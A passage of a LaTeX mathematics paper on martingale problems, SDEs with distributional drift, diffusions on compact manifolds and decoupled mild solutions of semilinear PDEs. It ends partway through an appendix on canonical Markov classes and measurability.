$(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times\mathbbm{R}^d}$ solves the Martingale Problem associated to $(a,\mathcal{D}(a),V_t\equiv t)$.
\end{proposition}
\begin{proof}
$(t,y)\mapsto \phi(t,h^{-1}(y))$ is of class $\mathcal{C}^{1,2}$; moreover
$\partial_x\left(\phi(r,\cdot)\circ h^{-1}\right)=\frac{\partial_x\phi}{h'}\circ h^{-1}$ and
$\partial_x^2\left(\phi(r,\cdot)\circ h^{-1}\right)=\frac{2L\phi}{\sigma^2h'^2}\circ h^{-1}=\frac{2L\phi}{\sigma_0^2}\circ h^{-1}$.
By It\^o formula we have
\begin{equation}
\begin{array}{rcl}
\phi(t,X_t)&=&\phi(t,h^{-1}(Y_t))\\
&=&\phi(s,x)+\int_s^t\left(\partial_t\phi(r,h^{-1}(Y_r))+\frac{1}{2}\sigma_0^2(Y_r)\partial_x^2\left(\phi(r,\cdot)\circ h^{-1}\right)(Y_r)\right)dr\\
&&+ \int_s^t\sigma_0(r,h^{-1}(Y_r))\partial_x\left(\phi(r,\cdot)\circ h^{-1}\right)(Y_r)dW_r\\
&=&\phi(s,x)+\int_s^t\left(\partial_t\phi(r,h^{-1}(Y_r))+L\phi(r,h^{-1}(Y_r))\right)dr\\
&&+\int_s^t\sigma_0(r,h^{-1}(Y_r))\frac{\partial_x\phi(r,h^{-1}(Y_r))}{h'(Y_r)}dW_r\\
&=&\phi(s,x)+\int_s^t\left(\partial_t\phi(r,X_r)+l(r,X_r))\right)dr+\int_s^t\sigma(r,X_r)\partial_x\phi(r,X_r)dW_r.
\end{array}
\end{equation}
Therefore $\phi(t,X_t)-\phi(s,x)-\int_s^ta(\phi)(r,X_r)dr=\int_s^t\sigma(r,X_r)\partial_x\phi(r,X_r)dW_r$ is a local martingale.
\end{proof}
In order to consider the $FBSDE^{s,x}(f,g)$ for functions $(f,g)$ having polynomial growth in $x$ we will show the following result.
We formulate here the supplementary assumption, called (TA) in \cite{frw1}.
This means the existence of strictly positive constants $c_1, C_1$ such that
\begin{equation} \label{(TA)}
c_1 \le \frac{e^\Sigma}{\sigma} \le C_1.
\end{equation}
\begin{proposition}\label{MomentsDistri}
We suppose that (TA) is fulfilled and $\sigma$ has linear growth.
Then, for any $p > 0$ and $(s,x)\in[0,T]\times\mathbbm{R}$, $\mathbbm{E}^{s,x}[|X_T|^p]<\infty$ and
$\mathbbm{E}^{s,x}[\int_s^T|X_r|^p dr]<\infty$. In other words,
the Markov class $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times\mathbbm{R}^d}$ verifies $H^{mom}(\zeta,\eta)$ (see Hypothesis \ref{HypMom}),
for $\zeta:x\longmapsto |x|^p$ and $\eta:x\longmapsto |x|^q$,
for every $p,q>0$.
\end{proposition}
\begin{proof}
We start by proving the proposition in the divergence form case,
meaning that $b=\frac{\sigma^2}{2}$.
\\
Let $(s,x)$ and $t\in[s,T]$ be fixed. Thanks to the Aronson estimates,
see e.g. \cite{ar} and also Section 5. of \cite{frw1}, there is a
constant $M > 0$ such that
\begin{equation}
\begin{array}{rcl}
\mathbbm{E}^{s,x}[|X_t|^p] &=&\int_{\mathbbm{R}}|y|^pp_{t-s}(x,y)dy\\
&\leq& \frac{M}{\sqrt{t-s}}\int_{\mathbbm{R}}|y|^pe^{-\frac{|x-y|^2}{M(t-s)}}dz\\
&=&M^{\frac{3}{2}}\int_{\mathbbm{R}}|x+z\sqrt{M(t-s)}|^pe^{-z^2}dz\\
&\leq&\sum_{k=0}^p M^{\frac{3+k}{2}} \binom{p}{k}
|x|^k|t-s|^{\frac{p-k}{2}}\int_{\mathbbm{R}}|z|^{p-k}e^{-z^2}dz,
\end{array}
\end{equation}
which
(for fixed $(s,x)$) is bounded in $t \in [s,T] $
and therefore Lebesgue integrable in $t$ on $[s,T]$.
This in particular shows that $\mathbbm{E}^{s,x}[|X_T|^p]$ and
$ \mathbbm{E}^{s,x}[\int_s^T|X_r|^pdr] (=
\int_s^T\mathbbm{E}^{s,x}[|X_r|^p]dr)$ are finite.
\\
Now we will consider the case in which $X$ only verifies \eqref{(TA)} and we will add the hypothesis that $\sigma$ has linear growth.
\\
Then there exists a process $Z$ (see Lemma 5.6 in \cite{frw1}) solving an SDE with distributional drift of divergence form generator, and a
function $k$ of class $\mathcal{C}^1$ such that $X=k^{-1}(Z)$. The
\eqref{(TA)} condition implies that there exist two constants such that $0<c\leq k'\sigma \leq C$ implying that for any $x$,
$(k^{-1})'(x)=\frac{1}{k'\circ k^{-1}(x)}\leq \frac{\sigma\circ k^{-1}(x)}{c}\leq C_2(1+ |k^{-1}(x)|)$,
for a positive constant $C_2$. So by Gronwall Lemma there exists $C_3>0$ such
that $k^{-1}(x)\leq C_3e^{C_2|x|}, \ \forall x \in {\mathbb R}$.
\\
Now thank to the Aronson estimates on the transition function
$p^Z$
of $Z$, for every $p > 0$, we have
\begin{equation}
\begin{array}{rcl}
\mathbbm{E}^{s,x}[|X|_t^p] &\leq& C_3\int e^{C_2p|z|}p^Z_{t-s}(k(x),z)dz\\
&\leq& \int e^{C_2p|z|}\frac{M}{\sqrt{t}}e^{-\frac{|k(x)-z|^2}{Mt}}dz\\
&\leq& M^{\frac{3}{2}}\int e^{C_2p(\sqrt{Mt}|y|+k(x))}e^{-y^2}dy\\
&\leq& Ae^{B k(x)} ,
\end{array}
\end{equation}
where $A,B$ are two constants depending on $p$ and $M$.
This implies that $\mathbbm{E}^{s,x}[|X_T|^p]<\infty$ and
$\mathbbm{E}^{s,x}[\int_s^T|X_r|^pdr]<\infty$.
\end{proof}
We can now state the main result of this section.
\begin{proposition}
Assume that the non-explosion condition \eqref{NonExplosion} is verified
and the validity of the two following items.
\begin{itemize}
\item the (TA) condition \eqref{(TA)} is fulfilled, $\sigma$ has linear growth and $(f,g)$ verifies $H^{lip}(\zeta,\eta)$ (see Hypothesis \ref{Hpq}) with $\zeta:x\mapsto|x|^p$, $\eta:x\mapsto|x|^q$ for some $p,q\in\mathbbm{R}_+$;
\item $(f,g)$ verifies $H^{lip}_b$, see Hypothesis \ref{Hpq}.
\end{itemize}
Then \eqref{PDEdistri} has a unique decoupled mild solution $u$ in the sense of Definition \ref{mildsoluv}.
\end{proposition}
\begin{proof}
The assertion comes from Theorem \ref{MainTheorem} which applies thanks to Propositions \ref{MPnewdomaindistri}, \ref{MomentsDistri} and \ref{HomoMeasurableint}.
\end{proof}
\begin{remark}
\begin{enumerate}
\item A first analysis linking
PDEs (in fact second order elliptic differential equations) with distributional drift and BSDEs
was performed by \cite{wurzer}.
In those BSDEs the final horizon was a stopping time.
\item In \cite{issoglio_jing16}, the authors have considered a class of BSDEs
involving particular distributions.
\end{enumerate}
\end{remark}
\subsection{Diffusion equations on differential manifolds}\label{S4d}
In this section, we will provide an example of application in a non
Euclidean space.
We consider a compact connected smooth differential manifold $M$ of dimension $n$. We denote by $\mathcal{C}^{\infty}(M)$ the linear algebra of smooth functions from $M$ to $\mathbbm{R}$, and $(U_i,\phi_i)_{i\in I}$ its atlas. The reader may consult \cite{jost}
for an extensive introduction to the study of differential manifolds, and \cite{hsu} concerning diffusions on differential manifolds.
\begin{lemma} \label{LPolish}
$M$ is Polish.
\end{lemma}
\begin{proof} \
By Theorem 1.4.1 in \cite{jost} $M$ may be equipped with a Riemannian metric,
that we denote by $g$ and its topology may be metrized by the associated distance which we denote by $d$.
As any
compact metric space, $(M,d)$ is separable and complete
so that $M$ is a Polish space.
\end{proof}
We denote by $(\Omega,\mathcal{F},(X_t)_{t\in[0,T]}(\mathcal{F})_{t\in[0,T]})$ the canonical space associated to $M$ and $T$,
see Definition \ref{canonicalspace}.
\begin{definition}
An operator $L:\mathcal{C}^{\infty}(M)\longrightarrow\mathcal{C}^{\infty}(M)$ will be called a \textbf{smooth second order elliptic non degenerate differential operator on $M$} if for any chart
$\phi:U\longrightarrow \mathbbm{R}^n$ there exist smooth $\mu:\phi(U)\longrightarrow \mathbbm{R}^n$ and $\alpha:\phi(U)\longrightarrow S^*_+(\mathbbm{R}^n)$ such that on $\phi(U)$ for any $f\in\mathcal{C}^{\infty}(M)$ we have
\begin{equation}
Lf(\phi^{-1}(x))=\frac{1}{2}\underset{i,j=1}{\overset{n}{\sum}}\alpha^{i,j}(x)\partial_{x_ix_j}(f\circ\phi^{-1})(x)+\underset{i=1}{\overset{n}{\sum}}\mu^i(x)\partial_{x_i}(f\circ\phi^{-1})(x).
\end{equation}
\end{definition}
$\alpha$ and $\mu$ depend on the chart $\phi$ but this dependence will be sometimes
omitted and we will say that for some given local coordinates,
\\ $Lf=\frac{1}{2}\underset{i,j=1}{\overset{n}{\sum}}\alpha^{i,j}\partial_{x_ix_j}f+\underset{i=1}{\overset{n}{\sum}}\mu^i\partial_{x_i}f$.
The following definition comes from \cite{hsu}, see Definition 1.3.1.
\begin{definition}
Let $L$ denote a smooth second order elliptic non degenerate differential operator on $M$.
Let $x\in M$. A probability measure $\mathbbm{P}^x$ on $(\Omega,\mathcal{F})$ will be called an \textbf{$L$-diffusion starting in $x$} if
\begin{itemize}
\item $\mathbbm{P}^x(X_0=x)=1$;
\item for every $f\in\mathcal{C}^{\infty}(M)$, $f(X)-\int_0^{\cdot}Lf(X_r)dr$ is a $(\mathbbm{P}^x,(\mathcal{F})_{t\in[0,T]}) )$ local martingale.
\end{itemize}
\end{definition}
\begin{remark}
No explosion can occur for continuous stochastic processes with values in
a compact space, so there is no need to consider paths in the compactification of $M$ as in Definition 1.1.4 in \cite{hsu}.
\\
Theorems 1.3.4 and 1.3.5 in \cite{hsu} state that for any $x\in M$, there exists a unique $L$-diffusion starting in $x$. Theorem 1.3.7 in \cite{hsu} implies that those probability measures $(\mathbbm{P}^x)_{x\in M}$ define a homogeneous Markov class.
\end{remark}
For a given operator $L$, the carr\'e du champs operator $\Gamma$ is given (in local coordinates) by
$\Gamma(\phi,\psi)=\underset{i,j=1}{\overset{n}{\sum}}\alpha^{i,j}\partial_{x_i}\phi\partial_{x_j}\phi$,
see equation (1.3.3) in \cite{hsu}. We wish to emphasize here that the carr\'e du champs operator has recently become a powerful tool in the study of geometrical properties of Riemannian manifolds. The reader may refer e.g. to \cite{bakry}.
\begin{definition}
$(\mathbbm{P}^x)_{x\in M}$ will be called the \textbf{$L$-diffusion}.
If $M$ is equipped with a specific Riemannian metric $g$
and $L$ is chosen to be equal to $\frac{1}{2}\Delta_g$ where $\Delta_g$ the Laplace-Beltrami operator associated to $g$, then $(\mathbbm{P}^x)_{x\in M}$ will be called the \textbf{Brownian motion associated to $g$}, see \cite{hsu} Chapter 3 for details.
\end{definition}
We now fix some smooth second order elliptic non degenerate differential operator $L$ and the $L$-diffusion $(\mathbbm{P}^x)_{x\in M}$. We introduce the associated Markov class $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times M}$ as described in Notation \ref{HomogeneNonHomogene}, which by Proposition \ref{HomoMeasurableint} is measurable in time.
\begin{notation}
We define $\mathcal{D}(\partial_t+L)$ the set of functions $u:[0,T]\times M\longrightarrow \mathbbm{R}$ such that, for any chart $\phi:U\longrightarrow \mathbbm{R}^n$, the mapping
\begin{equation}
\begin{array}{rcl}
[0,T]\times \phi(U)&\longrightarrow& \mathbbm{R}\\
(t,x) &\longmapsto& u(t,\phi^{-1}(x))
\end{array}
\end{equation}
belongs to $\mathcal{C}^{\infty}([0,T]\times \phi(U),\mathbbm{R})$, the set of infinitely continuously differentiable functions in the usual Euclidean setup.
\end{notation}
\begin{lemma}\label{LemmaManifold}
$\mathcal{D}(\partial_t+L)$ is a linear algebra included in $\mathcal{D}^{max}(\partial_t+L)$ as defined in Notation \ref{NotDomain}.
\end{lemma}
\begin{proof}
For some fixed chart $\phi:U\longrightarrow \mathbbm{R}^n$, $\mathcal{C}^{\infty}([0,T]\times \phi(U),\mathbbm{R})$ is an algebra, so it is immediate that $\mathcal{D}(\partial_t+L)$ is an algebra.
\\
Moreover, if $u\in\mathcal{D}(\partial_t+L)$, it is clear that
\begin{itemize}
\item $\forall x\in M$, $u(\cdot,x)\in\mathcal{C}^1([0,T],\mathbbm{R})$ and $\forall t\in[0,T]$, $u(t,\cdot)\in\mathcal{C}^{\infty}(M)$;
\item $\forall t\in[0,T]$, $\partial_t u(t,\cdot)\in\mathcal{C}^{\infty}(M)$ and $\forall x\in M$, $Lu(\cdot,x)\in\mathcal{C}^1([0,T],\mathbbm{R})$.
\end{itemize}
Given a chart $\phi:U\longrightarrow \mathbbm{R}^n$, by the Schwarz
Theorem allowing the commutation of partial derivatives
(in the classical Euclidean setup), we have for $x\in\phi(U)$
\begin{equation}
\begin{array}{rcl}
\partial_t\circ L(u)(t,\phi^{-1}(x))&=&\frac{1}{2}\underset{i,j=1}{\overset{n}{\sum}}\alpha^{i,j}(x)\partial_t\partial_{x_ix_j}(u(\cdot,\phi^{-1}(\cdot))(t,x)+\underset{i=1}{\overset{n}{\sum}}\mu^i(x)\partial_t\partial_{x_i}(u(\cdot,\phi^{-1}(\cdot))(t,x)\\
&=&\frac{1}{2}\underset{i,j=1}{\overset{n}{\sum}}\alpha^{i,j}(x)\partial_{x_ix_j}\partial_t(u(\cdot,\phi^{-1}(\cdot))(t,x)+\underset{i=1}{\overset{n}{\sum}}\mu^i(x)\partial_{x_i}\partial_t(u(\cdot,\phi^{-1}(\cdot))(t,x)\\
&=&L\circ\partial_t (u)(t,\phi^{-1}(x)).
\end{array}
\end{equation}
So $\partial_t\circ Lu=L\circ\partial_tu$. Finally $\partial_tu$, $Lu$ and $\partial_t\circ Lu$ are continuous (since they are continuous on all the sets $[0,T]\times U$ where $U$ is the domain of a chart) and are therefore bounded as continuous functions on the compact set $[0,T]\times M$.
This concludes the proof.
\end{proof}
\begin{corollary}
$(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times M}$ solves the well-posed Martingale Problem associated to $(\partial_t+L,\mathcal{D}(\partial_t+L),V_t\equiv t)$ in the sense of Definition \ref{MartingaleProblem}.
\end{corollary}
\begin{proof}
The corollary derives from Lemma \ref{LemmaManifold} and Corollary \ref{conclusionA4}.
\end{proof}
We fix a couple $(f,g)$ verifying $H^{lip}_b$ (see Hypothesis \ref{Hpq})
and consider the PDE
\begin{equation}\label{PDEmanifold}
\left\{
\begin{array}{l}
\partial_tu + Lu +f(\cdot,\cdot,u,\sqrt{\Gamma(u,u)})=0\quad\text{ on }[0,T]\times M\\
u(T,\cdot) = g.
\end{array}\right.
\end{equation}
Since Theorem \ref{MainTheorem} applies, we have the following result.
\begin{proposition}
Equation \eqref{PDEmanifold} admits a unique decoupled mild solution $u$ in the sense of Definition \ref{mildsoluv}.
\end{proposition}
\begin{remark}
Since $M$ is compact, we emphasize that if $g$ is continuous and $f$ is continuous in $t,x$ Lipschitz in $y,z$ then $(f,g)$ verifies $H^{lip}_b$.
\end{remark}
\begin{appendices}
\section{Markov classes}\label{A2}
In this Appendix we recall some basic definitions and results concerning Markov processes. For a complete study of homogeneous Markov processes, one may consult \cite{dellmeyerD}, concerning non-homogeneous Markov classes, our reference was chapter VI of \cite{dynkin1982markov}. The first definition refers to the canonical space that one can find in \cite{jacod79}, see paragraph 12.63.
\begin{notation}\label{canonicalspace}
In the whole section $E$ will be a fixed Polish space (a separable
completely metrizable topological space). $E$ will be called the \textbf{state space}.
\\
\\
We consider $T\in\mathbbm{R}^*_+$. We denote $\Omega:=\mathbbm{D}([0,T],E)$
the space of functions from $[0,T]$ to $E$ right-continuous with left limits and continuous at time $T$, e.g. cadlag. For any $t\in[0,T]$ we denote the coordinate mapping $X_t:\omega\mapsto\omega(t)$, and we introduce on $\Omega$ the $\sigma$-field $\mathcal{F}:=\sigma(X_r|r\in[0,T])$.
\\
On the measurable space $(\Omega,\mathcal{F})$, we introduce the measurable \textbf{canonical process}
\begin{equation*}
X:
\begin{array}{rcl}
(t,\omega)&\longmapsto& \omega(t)\\ \relax
([0,T]\times \Omega,\mathcal{B}([0,T])\otimes\mathcal{F}) &\longrightarrow & (E,\mathcal{B}(E)),
\end{array}
\end{equation*}
and the right-continuous filtration $(\mathcal{F}_t)_{t\in[0,T]}$ where $\mathcal{F}_t:=\underset{s\in]t,T]}{\bigcap}\sigma(X_r|r\leq s)$ if $t<T$, and $\mathcal{F}_T:= \sigma(X_r|r\in[0,T])=\mathcal{F}$.
\\
$\left(\Omega,\mathcal{F},(X_t)_{t\in[0,T]},(\mathcal{F}_t)_{t\in[0,T]}\right)$ will be called the \textbf{canonical space} (associated to $T$ and $E$).
\\
For any $t \in [0,T]$ we denote $\mathcal{F}_{t,T}:=\sigma(X_r|r\geq t)$, and
for any $0\leq t\leq u<T$ we will denote
$\mathcal{F}_{t,u}:= \underset{n\geq 0}{\bigcap}\sigma(X_r|r\in[t,u+\frac{1}{n}])$.
\end{notation}
Since $E$ is Polish, we recall that $\mathbbm{D}([0,T],E)$ can be equipped with a Skorokhod distance which makes it a Polish metric space (see Theorem 5.6 in chapter 3 of \cite{EthierKurz}, and for which the Borel $\sigma$-field is $\mathcal{F}$, see Proposition 7.1 in Chapter 3 of \cite{EthierKurz}. This in particular implies that $\mathcal{F}$ is separable, as the Borel $\sigma$-field of a separable metric space.
\begin{remark}
Previous definitions and all the notions of this Appendix,
extend to a time interval equal to $\mathbbm{R}_+$ or replacing the Skorokhod space with the Wiener space of continuous functions from $[0,T]$ (or $\mathbbm{R}_+$) to $E$.
\end{remark}
\begin{definition}\label{Defp}
The function
\begin{equation*}
p:\begin{array}{rcl}
(s,x,t,A) &\longmapsto& p(s,x,t,A) \\ \relax
[0,T]\times E\times[0,T]\times\mathcal{B}(E) &\longrightarrow& [0,1],
\end{array}
\end{equation*}
will be called \textbf{transition function} if, for any $s,t$ in $[0,T]$,
$x_0\in E$, $A\in \mathcal{B}(E)$,
it verifies
\begin{enumerate}
\item $x \mapsto p(s,x,t,A)$ is Borel,
\item $B \mapsto p(s,x_0,t,B)$ is a probability measure on $(E,\mathcal{B}(E))$,
\item if $t\leq s$ then $p(s,x_0,t,A)=\mathds{1}_{A}(x_0)$,
\item if $s<t$, for any $u>t$, $\int_{E} p(s,x_0,t,dy)p(t,y,u,A) =
p(s,x_0,u,A)$.
\end{enumerate}
\end{definition}
The latter statement is the well-known \textbf{Chapman-Kolmogorov equation}.
\begin{definition}\label{DefFoncTrans}
A transition function $p$ for which the first item is reinforced
supposing that $(s,x)\longmapsto p(s,x,t,A)$ is Borel for any $t,A$,
will be said \textbf{measurable in time}.
\end{definition}
\begin{remark} \label{RDefFoncTrans}
Let $p$ be a transition function which is measurable in time.
By approximation by step functions, one can easily show that,
for any Borel function $\phi$ from $E$ to ${\mathbbm{\bar R}}$ then
$(s,x)\mapsto \int \phi(y)p(s,x,t,dy)$ is Borel, provided
$\phi$ is quasi integrable for every $(s,x)$.
\end{remark}
\begin{definition}\label{defMarkov}
A \textbf{canonical Markov class} associated to a transition function $p$ is a set of probability measures $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times E}$ defined on the measurable space
$(\Omega,\mathcal{F})$ and verifying for any $t \in [0,T]$ and $A\in\mathcal{B}(E)$
\begin{equation}\label{Markov1}
\mathbbm{P}^{s,x}(X_t\in A)=p(s,x,t,A),
\end{equation}
and for any $s\leq t\leq u$
\begin{equation}\label{Markov2}
\mathbbm{P}^{s,x}(X_u\in A|\mathcal{F}_t)=p(t,X_t,u,A)\quad \mathbbm{P}^{s,x}\text{ a.s.}
\end{equation}
\end{definition}
\begin{remark}\label{Rfuturefiltration}
Formula 1.7 in Chapter 6 of \cite{dynkin1982markov} states
that for any $F\in \mathcal{F}_{t,T}$ yields
\begin{equation}\label{Markov3}
\mathbbm{P}^{s,x}(F|\mathcal{F}_t) = \mathbbm{P}^{t,X_t}(F)=\mathbbm{P}^{s,x}(F|X_t)\,\text{ }\, \mathbbm{P}^{s,x} \text{a.s.}
\end{equation}
Property \eqref{Markov3} will be called
\textbf{Markov property}.
\end{remark}
For the rest of this section, we are given a canonical Markov class $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times E}$ with transition function $p$.
\\
We will complete the $\sigma$-fields ${\mathcal F}_t$ of the canonical filtration by $\mathbbm{P}^{s,x}$ as follows.
\begin{definition}\label{CompletedBasis}
For any $(s,x)\in[0,T]\times E$ we will consider the $(s,x)$-\textbf{completion} $\left(\Omega,\mathcal{F}^{s,x},(\mathcal{F}^{s,x}_t)_{t\in[0,T]},\mathbbm{P}^{s,x}\right)$ of the stochastic basis $\left(\Omega,\mathcal{F},(\mathcal{F}_t)_{t\in[0,T]},\mathbbm{P}^{s,x}\right)$ by defining $\mathcal{F}^{s,x}$ as the $\mathbbm{P}^{s,x}$-completion of $\mathcal{F}$, by extending $\mathbbm{P}^{s,x}$ to $\mathcal{F}^{s,x}$ and finally by defining $\mathcal{F}^{s,x}_t$ as the $\mathbbm{P}^{s,x}$-closure of $\mathcal{F}_t$ (meaning $\mathcal{F}_t$ augmented with the $\mathbbm{P}^{s,x}$-negligible sets) for every $t\in[0,T]$.
\end{definition}
We remark that, for any $(s,x)\in[0,T]\times E$, $\left(\Omega,\mathcal{F}^{s,x},(\mathcal{F}^{s,x}_t)_{t\in[0,T]},\mathbbm{P}^{s,x}\right)$ is a stochastic basis fulfilling the usual conditions, see (1.4) in chapter I of \cite{jacod}).
We recall that considering a conditional expectation with respect to a $\sigma$-field augmented with the negligible sets or not, does not change the result. In particular we have the following.
\begin{proposition}\label{ConditionalExp}
Let $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times E}$ be a canonical Markov class. Let $(s,x)\in[0,T]\times E$ be fixed, $Z$ be a random variable and $t\in[s,T]$, then
\\
$\mathbbm{E}^{s,x}[Z|\mathcal{F}_t]=\mathbbm{E}^{s,x}[Z|\mathcal{F}^{s,x}_t]$ $\mathbbm{P}^{s,x}$ a.s.
\end{proposition}
\begin{proposition}\label{Borel}
Let $Z$ be a random variable. If the function $(s,x)\longmapsto \mathbbm{E}^{s,x}[Z]$
is well-defined (with possible values in $[-\infty, \infty]$), then at fixed $s\in[0,T]$,
$x\longmapsto \mathbbm{E}^{s,x}[Z]$ is Borel.
If moreover the transition function $p$ is measurable in time then, $(s,x)\longmapsto \mathbbm{E}^{s,x}[Z]$ is Borel. \\
In particular if $F\in \mathcal{F}$ be fixed, then at fixed $s\in[0,T]$, $x\longmapsto \mathbbm{P}^{s,x}(F)$ is Borel. If
the transition function $p$ is measurable in time then, $(s,x)\longmapsto \mathbbm{P}^{s,x}(F)$ is Borel.
\end{proposition}
\begin{proof}
We will only deal with the case of a measurable in time transition function since the other case is proven in a very similar way.
\\
We consider first the case $Z = 1_F$ where $F\in \mathcal{F}$.
We start by assuming that $F$ is of the form $\underset{i\leq n}{\bigcap}\{X_{t_i}\in A_i\},$ where $n\in\mathbbm{N}^*$, $0=t_0 \leq t_1<\cdots<t_n \le T$ and $A_1,\cdots,A_n$ are Borel sets of $E$, and we denote by $\Pi$ the set of such events. \\
In this proof we will make use of monotone class arguments,
see for instance Section 4.3 in \cite{aliprantis} for the definitions of $\pi$-systems and $\lambda$-systems and for the presently used
version of the monotone class
theorem, also called the Dynkin's lemma.
\\
We remark
that $\Pi$ is a $\pi$-system (see Definition 4.9 in \cite{aliprantis}) generating $\mathcal{F}$. For such events we can explicitly compute $\mathbbm{P}^{s,x}(F)$.
We compute
this when $(s,x)$ belongs to
$[t_{i^*-1}-1,t_{i^*}[\times E$ for some
$0< i^* \leq n$.
On $[t_n,T]\times E$, a similar computation can be performed.
We will show below that those restricted functions are Borel,
the general result will follow by
concatenation.
We have
\begin{equation*}
\begin{array}{rcl}
& &\mathbbm{P}^{s,x}(F) \\
&=& \overset{i^*-1}{\underset{i=1}{\Pi}}\mathds{1}_{A_i}(x)\mathbbm{E}^{s,x}\left[\overset{n}{\underset{j=i^*}{\Pi}}\mathds{1}_{A_i}(X_{t_i})\right]\\
&=& \overset{i^*-1}{\underset{i=1}{\Pi}}\mathds{1}_{A_i}(x)\mathbbm{E}^{s,x}\left[\overset{n-1}{\underset{j=i^*}{\Pi}}\mathds{1}_{A_i}(X_{t_i})\mathbbm{E}^{s,x}[\mathds{1}_{A_n}(X_{t_n})|\mathcal{F}_{t_{n-1}}]\right]\\
&=& \overset{i^*-1}{\underset{i=1}{\Pi}}\mathds{1}_{A_i}(x)\mathbbm{E}^{s,x}\left[\overset{n-1}{\underset{j=i^*}{\Pi}}\mathds{1}_{A_i}(X_{t_i})p(t_{n-1},X_{t_{n-1}},t_n,A_n)\right]\\
&=&\cdots\\
&=&\overset{i^*-1}{\underset{i=1}{\Pi}}\mathds{1}_{A_i}(x)\bigintsss \left(\overset{n}{\underset{j=i^*+1}{\Pi}}\mathds{1}_{A_j}(x_j)p(t_{j-1},x_{j-1},t_j,dx_j)\right)\mathds{1}_{A_{i^*}}(x_{i^*})p(s,x,t_{i^*},dx_{i^*}),
\end{array}
\end{equation*}
which indeed is Borel in $(s,x)$ thank to Definition \ref{DefFoncTrans}
and Remark \ref{RDefFoncTrans}.
\\
We can extend this result to any event $F$ by the monotone class theorem. Indeed, let $\Lambda$ be the set of elements $F$ of $\mathcal{F}$ such that $(s,x)\mapsto\mathbbm{P}^{s,x}(F)$ is Borel. For any two events $F^1$, $F^2$, in $\Lambda$ with $F^1\subset F^2$, since for any $(s,x)$,
\\
$\mathbbm{P}^{s,x}(F^2\backslash F^1)=\mathbbm{P}^{s,x}(F^2)-\mathbbm{P}^{s,x}(F^1)$, $(s,x)\mapsto\mathbbm{P}^{s,x}(F^2\backslash F^1)$ is still Borel. For any increasing sequence $(F^n)_{n\geq 0}$ of
elements of $\Lambda$, $\mathbbm{P}^{s,x}(\underset{n\in\mathbbm{N}}{\bigcup}F^n)=\underset{n\rightarrow\infty}{\text{lim }}\mathbbm{P}^{s,x}(F^n)$ so $(s,x)\mapsto \mathbbm{P}^{s,x}(\underset{n\in\mathbbm{N}}{\bigcup}F^n)$ is still Borel, therefore $\Lambda$ is a $\lambda$-system containing the $\pi$-system $\Pi$ which generates $\mathcal{F}$. So by the monotone class theorem, $\Lambda=\mathcal{F}$,
which shows the case $Z = 1_F$.
\\
We go on with the proof when $Z$ is a general r.v. If $Z\geq 0$, there exists an increasing sequence $(Z_n)_{n\geq 0}$ of simple functions on $\Omega$ converging pointwise to $Z$, and thank to the first statement of the Proposition, for each of these functions, $(s,x)\mapsto \mathbbm{E}^{s,x}[Z_n]$ is Borel. Therefore since by monotonic convergence, $ \mathbbm{E}^{s,x}[Z_n]\underset{n\rightarrow\infty}{\longrightarrow}\mathbbm{E}^{s,x}[Z]$, then $(s,x)\mapsto\mathbbm{E}^{s,x}[Z]$ is Borel as the pointwise limit of Borel functions. For a general $Z$ one just has to consider its decomposition $Z=Z^+-Z^-$ where $Z^+$ and $Z^-$ are positive.
\end{proof}
\begin{lemma}\label{LemmaBorel}
Assume that the transition function of the canonical Markov class is measurable in time.
\\
Let $V$ be a continuous non-decreasing function on $[0,T]$ and
$f\in\mathcal{B}([0,T]\times E,\mathbbm{R})$ be such that for every $(s,x)\in[0,T]\times E$,
$\mathbbm{E}^{s,x}[\int_s^{T}|f(r,X_r)|dV_r]<\infty$. Then
$(s,x)\longmapsto \mathbbm{E}^{s,x}[\int_s^{T}f(r,X_r)dV_r]$ is Borel.
\end{lemma}
\begin{proof}
We will start by showing that on $([0,T]\times E)\times [0,T]$, the function
\\
$k^n:(s,x,t)\mapsto \mathbbm{E}^{s,x}[\int_{t}^{T}((-n)\vee f(r,X_r)\wedge n)dV_r]$ is Borel, where $n\in\mathbbm{N}$.
\\
Let $t\in[0,T]$ be fixed. Then by Proposition \ref{Borel},
\\
$(s,x)\mapsto\mathbbm{E}^{s,x}[\int_t^{T}((-n)\vee f(r,X_r)\wedge n)dV_r]$ is Borel. Let $(s,x)\in[0,T]\times E$ be fixed and $t_m\underset{m\rightarrow\infty}{\longrightarrow} t$ be a converging sequence in $[0,T]$. Since $V$ is continuous, $\int_{t_m}^{T}((-n)\vee f(r,X_r)\wedge n)dV_r\underset{m\rightarrow\infty}{\longrightarrow}\int_{t}^{T}((-n)\vee f(r,X_r)\wedge n)dV_r$ a.s. Since this sequence is uniformly bounded, by dominated convergence theorem, the same convergence holds under the expectation. This implies that $t\mapsto \mathbbm{E}^{s,x}[\int_t^{T}((-n)\vee f(r,X_r)\wedge n)dV_r]$ is continuous. By Lemma 4.51 in \cite{aliprantis}, $k^n$ is therefore jointly Borel.
\\
By composing with $(s,x,t)\mapsto (s,x,s)$, we also have that for any $n\geq 0$, $\tilde{k}^n:(s,x)\longmapsto\mathbbm{E}^{s,x}[\int_s^{T}((-n)\vee f(r,X_r)\wedge n)dV_r]$ is Borel. Then by letting $n$ tend to infinity, $(-n)\vee f(r,X_r)\wedge n$ tends $dV\otimes d\mathbbm{P}^{s,x}$ a.e. to $f(r,X_r)$ and since we assumed $\mathbbm{E}^{s,x}[\int_s^{T}|f(r,X_r)|dV_r]<\infty$, by dominated convergence, $\mathbbm{E}^{s,x}[\int_s^{T}((-n)\vee f(r,X_r)\wedge n)dV_r]$ tends to $\mathbbm{E}^{s,x}[\int_s^{T}f(r,X_r)dV_r]$.
\\
$(s,x)\longmapsto \mathbbm{E}^{s,x}[\int_s^{T}f(r,X_r)dV_r]$ is therefore Borel as the pointwise limit of the $\tilde{k}^n$ which are Borel.
\end{proof}
\begin{proposition}\label{measurableint}
Let $f\in\mathcal{B}([0,T]\times E,\mathbbm{R})$ be such that for any $(s,x,t)$, $\mathbbm{E}^{s,x}[|f(t,X_t)|]<\infty$ then at fixed $s\in[0,T]$, $(x,t)\longmapsto \mathbbm{E}^{s,x}[f(t,X_t)]$ is Borel. If moreover the transition function $p$ is measurable in time, then
\\
